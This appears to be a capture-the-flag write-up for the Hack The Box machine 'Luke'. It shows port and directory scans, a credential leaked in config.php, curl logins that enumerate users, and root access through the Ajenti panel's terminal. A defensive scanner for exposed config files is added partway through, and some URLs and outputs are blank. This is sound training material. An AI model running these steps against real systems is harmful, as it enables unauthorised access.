Writeup for the retired HTB machine Luke
Link: https://www.hackthebox.eu/home/machines/profile/190


A quick port scan reveals multiple open ports:

21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)  
| ftp-anon: Anonymous FTP login allowed (FTP code 230)  
22/tcp   open  ssh?  
3000/tcp open  http    Node.js Express framework  
8000/tcp open  http    Ajenti http control panel  

The FTP holds a note from Derry to Chihiro, which reveals these two usernames.

Dirb scan for main:

As there are multiple websites hosted, all of them are checked for subfolders and interesting files:

START_TIME: Sun Sep  1 15:04:07 2019
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

---- Scanning URL: ----
==> DIRECTORY:
+ (CODE:200|SIZE:3138)
==> DIRECTORY:
+ (CODE:200|SIZE:1093)
+ (CODE:401|SIZE:381)
==> DIRECTORY:

Dirb scan for 3000:

WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt

---- Scanning URL: ----
+ (CODE:200|SIZE:13)
+ (CODE:200|SIZE:56)

gobuster for main:

As the Dirb scans were run without file extensions, a gobuster scan with extensions enabled is conducted as well:

Important: Check for extensions! (-x)
gobuster dir -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html

2019/09/01 15:58:46 Starting gobuster
/index.html (Status: 200)
/login.php (Status: 200)
/member (Status: 301)
/management (Status: 401)
/css (Status: 301)
/js (Status: 301)
/vendor (Status: 301)
/config.php (Status: 200)
/LICENSE (Status: 200)
Progress: 163025 / 220561 (73.91%)^C
[!] Keyboard interrupt detected, terminating.

This yields a file which reveals credentials: root:Zk6heYCyv6ZE9Xcg. These creds can be used to log in at :3000/login, but the username root doesn't work… admin does.

curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg"}'

The resulting token can be used to enumerate users: curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE'

[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]

Enumerating port 3000 further shows that an endpoint /user/{username} exists, so every single user can be queried individually:

curl -s -X GET -H 'Accept: application/json' -H 'Content-Type: application/json' -H 'Authorization: Bearer INSERTTOKENHERE'
which yields:


With these, we can try to log in to /management, where a config.json is found. That file holds credentials as well.
With those credentials, one can log in to :8000 (Ajenti).
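Both of the steps above come down to the same weakness: a credential file (config.php on the main site, config.json under /management) sits inside a directory the web server serves. As an added example, not part of the original writeup and not code from the box, here is a small defender-side check that walks a web root and reports config-style files containing credential assignments, so such files are caught before a directory brute force does. The sample web root, file names and placeholder passwords below are constructed for the demonstration; the regex patterns are an assumption and are deliberately simple.

```python
import json
import os
import re
import tempfile
from pathlib import Path

# File types a web server tends to hand out verbatim or that commonly hold settings.
# Assumption: this list is a starting point, not a complete one.
CONFIG_SUFFIXES = {".php", ".json", ".txt", ".ini", ".env"}

# Constructed patterns for credential-looking assignments; tried in order per line.
PATTERNS = [
    # PHP style: $dbPassword = 'x';  $password = "x";
    re.compile(r"\$(?:db)?(?:pass|password|pwd)\s*=\s*['\"]([^'\"]+)['\"]", re.I),
    # JSON / INI / env style: "password": "x"   or   password=x
    re.compile(r"[\"']?(?:pass|password|pwd)[\"']?\s*[:=]\s*[\"']?([^\"',\s]+)", re.I),
]


def scan_file(path: Path):
    """Return (line_number, captured_secret) tuples for credential-looking lines."""
    hits = []
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return hits
    for number, line in enumerate(text.splitlines(), 1):
        for pattern in PATTERNS:
            match = pattern.search(line)
            if match:
                hits.append((number, match.group(1)))
                break
    return hits


def find_exposed_credentials(webroot):
    """Walk a served directory tree; map relative path -> hits for files holding secrets."""
    webroot = Path(webroot)
    findings = {}
    for dirpath, _dirs, files in os.walk(webroot):
        for name in files:
            path = Path(dirpath) / name
            if path.suffix.lower() not in CONFIG_SUFFIXES:
                continue  # static assets such as .css or .html are not config files
            hits = scan_file(path)
            if hits:
                findings[path.relative_to(webroot).as_posix()] = hits
    return findings


def build_sample_webroot():
    """Constructed sample tree resembling the layout found by gobuster (not the box's files)."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.html").write_text("<html><body>hello</body></html>\n")
    (root / "config.php").write_text(
        "<?php\n"
        "$dbHost = 'localhost';\n"
        "$dbUsername = 'root';\n"
        "$dbPassword = 'PLACEHOLDER_DB_PASS';\n"  # placeholder, not a real credential
    )
    (root / "management").mkdir()
    (root / "management" / "config.json").write_text(json.dumps(
        {"auth": {"username": "admin", "password": "PLACEHOLDER_PANEL_PASS"}}, indent=2))
    (root / "css").mkdir()
    (root / "css" / "style.css").write_text("body { color: red }\n")
    return root


if __name__ == "__main__":
    sample = build_sample_webroot()
    for rel_path, hits in sorted(find_exposed_credentials(sample).items()):
        for line_number, secret in hits:
            print(f"{rel_path}:{line_number}: credential-looking value ({len(secret)} chars)")
```

Run it against a real document root as a pre-deployment check; anything it reports should be moved outside the served tree or loaded from the environment, and the `.php` files that remain should contain no literal passwords, since a misconfiguration or a raw-source disclosure turns them into exactly the leak this box shows.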

Ajenti provides a comfortable web interface for management, including a Terminal (located under Tools).
Opening that Terminal yields a root shell on the system that can be used to print the root flag.